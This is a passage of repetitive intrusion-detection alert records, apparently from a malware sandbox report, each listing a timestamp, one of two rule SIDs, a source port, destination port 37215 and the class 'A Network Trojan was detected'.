          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468013
          SID:2829579
          Source Port:44676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.723461
          SID:2835222
          Source Port:58564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944430
          SID:2835222
          Source Port:60074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245520
          SID:2835222
          Source Port:60508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985432
          SID:2835222
          Source Port:54426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010497
          SID:2829579
          Source Port:57124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820394
          SID:2829579
          Source Port:36088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644281
          SID:2835222
          Source Port:36366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294274
          SID:2829579
          Source Port:53210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860718
          SID:2835222
          Source Port:42882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283344
          SID:2829579
          Source Port:36854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720822
          SID:2835222
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928638
          SID:2835222
          Source Port:36094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.858765
          SID:2829579
          Source Port:47290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993440
          SID:2829579
          Source Port:47410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035803
          SID:2835222
          Source Port:57632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075722
          SID:2829579
          Source Port:33982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162735
          SID:2835222
          Source Port:54208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287383
          SID:2835222
          Source Port:45784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225945
          SID:2829579
          Source Port:53376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568430
          SID:2835222
          Source Port:51338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682075
          SID:2835222
          Source Port:46762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475632
          SID:2829579
          Source Port:38346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474811
          SID:2835222
          Source Port:47014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289567
          SID:2835222
          Source Port:33304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132358
          SID:2835222
          Source Port:55672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.309512
          SID:2835222
          Source Port:60638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166198
          SID:2835222
          Source Port:52400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714350
          SID:2829579
          Source Port:44118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922170
          SID:2829579
          Source Port:36992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606112
          SID:2835222
          Source Port:40980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986440
          SID:2829579
          Source Port:40306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073871
          SID:2829579
          Source Port:33166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161053
          SID:2835222
          Source Port:49410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929090
          SID:2829579
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645859
          SID:2835222
          Source Port:34108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823196
          SID:2829579
          Source Port:54996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037161
          SID:2835222
          Source Port:59276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646318
          SID:2835222
          Source Port:37232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822638
          SID:2829579
          Source Port:37538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929238
          SID:2829579
          Source Port:47496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412046
          SID:2829579
          Source Port:49866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168612
          SID:2829579
          Source Port:58578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948678
          SID:2835222
          Source Port:36822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860692
          SID:2829579
          Source Port:42102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400196
          SID:2835222
          Source Port:39404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166517
          SID:2829579
          Source Port:37986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540187
          SID:2835222
          Source Port:41112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289498
          SID:2835222
          Source Port:39678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718561
          SID:2835222
          Source Port:57008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297627
          SID:2829579
          Source Port:52858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720365
          SID:2829579
          Source Port:43818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921971
          SID:2829579
          Source Port:39070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080782
          SID:2835222
          Source Port:58476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918242
          SID:2829579
          Source Port:58156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081714
          SID:2829579
          Source Port:59778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162849
          SID:2835222
          Source Port:57312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944740
          SID:2835222
          Source Port:51746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945875
          SID:2835222
          Source Port:42364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166586
          SID:2829579
          Source Port:38968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719538
          SID:2835222
          Source Port:57534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718223
          SID:2829579
          Source Port:39332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076624
          SID:2829579
          Source Port:59348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227515
          SID:2835222
          Source Port:53300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037891
          SID:2829579
          Source Port:58970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004433
          SID:2829579
          Source Port:39110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603529
          SID:2829579
          Source Port:48368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273409
          SID:2829579
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597992
          SID:2829579
          Source Port:56790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988718
          SID:2835222
          Source Port:34110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696443
          SID:2829579
          Source Port:39560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028986
          SID:2829579
          Source Port:37246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989347
          SID:2835222
          Source Port:33054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.307334
          SID:2829579
          Source Port:41338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942056
          SID:2829579
          Source Port:47526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988016
          SID:2835222
          Source Port:55576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004560
          SID:2829579
          Source Port:56448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994459
          SID:2835222
          Source Port:44552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224309
          SID:2835222
          Source Port:56052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687576
          SID:2829579
          Source Port:60912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929502
          SID:2835222
          Source Port:55360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643501
          SID:2835222
          Source Port:39848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067329
          SID:2829579
          Source Port:58072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471811
          SID:2835222
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267359
          SID:2835222
          Source Port:47504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819988
          SID:2829579
          Source Port:49896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928616
          SID:2829579
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165471
          SID:2829579
          Source Port:54274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822368
          SID:2835222
          Source Port:51156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223965
          SID:2829579
          Source Port:46246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929901
          SID:2829579
          Source Port:46570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161285
          SID:2835222
          Source Port:42412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162567
          SID:2829579
          Source Port:55068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301162
          SID:2829579
          Source Port:36240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562165
          SID:2835222
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867400
          SID:2829579
          Source Port:50502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416323
          SID:2835222
          Source Port:36626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718835
          SID:2835222
          Source Port:41226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164452
          SID:2835222
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820490
          SID:2835222
          Source Port:55020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280558
          SID:2835222
          Source Port:36508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471015
          SID:2829579
          Source Port:41044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162090
          SID:2829579
          Source Port:54978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290123
          SID:2829579
          Source Port:51806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418934
          SID:2835222
          Source Port:34244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720941
          SID:2829579
          Source Port:52896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000567
          SID:2835222
          Source Port:43624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870786
          SID:2835222
          Source Port:50140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289007
          SID:2835222
          Source Port:48518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930369
          SID:2835222
          Source Port:43800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930114
          SID:2835222
          Source Port:42174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291271
          SID:2829579
          Source Port:33026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562067
          SID:2829579
          Source Port:58654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412992
          SID:2835222
          Source Port:57290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415482
          SID:2835222
          Source Port:50402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037893
          SID:2835222
          Source Port:36430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164698
          SID:2829579
          Source Port:60538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292644
          SID:2829579
          Source Port:44596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602582
          SID:2829579
          Source Port:40844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552257
          SID:2835222
          Source Port:59302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468671
          SID:2829579
          Source Port:52360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129846
          SID:2829579
          Source Port:52628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281973
          SID:2829579
          Source Port:36418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915890
          SID:2835222
          Source Port:48462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820324
          SID:2835222
          Source Port:55602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929414
          SID:2835222
          Source Port:60854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947551
          SID:2829579
          Source Port:54094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004099
          SID:2835222
          Source Port:35712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076538
          SID:2829579
          Source Port:35322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653506
          SID:2829579
          Source Port:40136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693952
          SID:2829579
          Source Port:40690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306361
          SID:2835222
          Source Port:60258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246649
          SID:2829579
          Source Port:37560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948898
          SID:2829579
          Source Port:57704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157302
          SID:2835222
          Source Port:34780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904427
          SID:2829579
          Source Port:47212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033845
          SID:2829579
          Source Port:35062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719321
          SID:2835222
          Source Port:41710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475981
          SID:2829579
          Source Port:35884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294883
          SID:2835222
          Source Port:43466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490093
          SID:2835222
          Source Port:34478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166547
          SID:2829579
          Source Port:58202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242752
          SID:2829579
          Source Port:41682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103704
          SID:2835222
          Source Port:35206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287525
          SID:2829579
          Source Port:34486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920959
          SID:2835222
          Source Port:42236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251407
          SID:2835222
          Source Port:40638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.276662
          SID:2835222
          Source Port:53670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600575
          SID:2829579
          Source Port:50160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713541
          SID:2829579
          Source Port:53800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162985
          SID:2829579
          Source Port:52980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986372
          SID:2835222
          Source Port:48752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034979
          SID:2835222
          Source Port:51246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286687
          SID:2829579
          Source Port:57800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914228
          SID:2829579
          Source Port:54406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642975
          SID:2835222
          Source Port:33706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691903
          SID:2829579
          Source Port:39808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080479
          SID:2829579
          Source Port:49636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925362
          SID:2835222
          Source Port:37112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539031
          SID:2835222
          Source Port:33542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684661
          SID:2835222
          Source Port:55334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952350
          SID:2829579
          Source Port:44830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823516
          SID:2829579
          Source Port:53072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602202
          SID:2835222
          Source Port:49482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915623
          SID:2835222
          Source Port:38138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478841
          SID:2829579
          Source Port:56762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166143
          SID:2829579
          Source Port:60368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475971
          SID:2835222
          Source Port:49560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012971
          SID:2835222
          Source Port:36960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677163
          SID:2835222
          Source Port:50376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029637
          SID:2829579
          Source Port:60202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537988
          SID:2829579
          Source Port:58338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289798
          SID:2829579
          Source Port:42288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104085
          SID:2835222
          Source Port:39954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821929
          SID:2829579
          Source Port:53898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082185
          SID:2835222
          Source Port:49648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102662
          SID:2835222
          Source Port:56904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718338
          SID:2829579
          Source Port:43402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645795
          SID:2835222
          Source Port:32936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250908
          SID:2829579
          Source Port:37466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288266
          SID:2829579
          Source Port:60386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137986
          SID:2835222
          Source Port:52748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894663
          SID:2829579
          Source Port:49112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.949146
          SID:2835222
          Source Port:33080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.281999
          SID:2835222
          Source Port:35584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412025
          SID:2835222
          Source Port:46742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222948
          SID:2835222
          Source Port:59420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921814
          SID:2829579
          Source Port:58436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597032
          SID:2829579
          Source Port:48110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034180
          SID:2835222
          Source Port:41274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226019
          SID:2835222
          Source Port:35110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472217
          SID:2829579
          Source Port:35986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944855
          SID:2835222
          Source Port:47286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164757
          SID:2829579
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693001
          SID:2835222
          Source Port:39624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036801
          SID:2829579
          Source Port:42414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819061
          SID:2829579
          Source Port:36992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
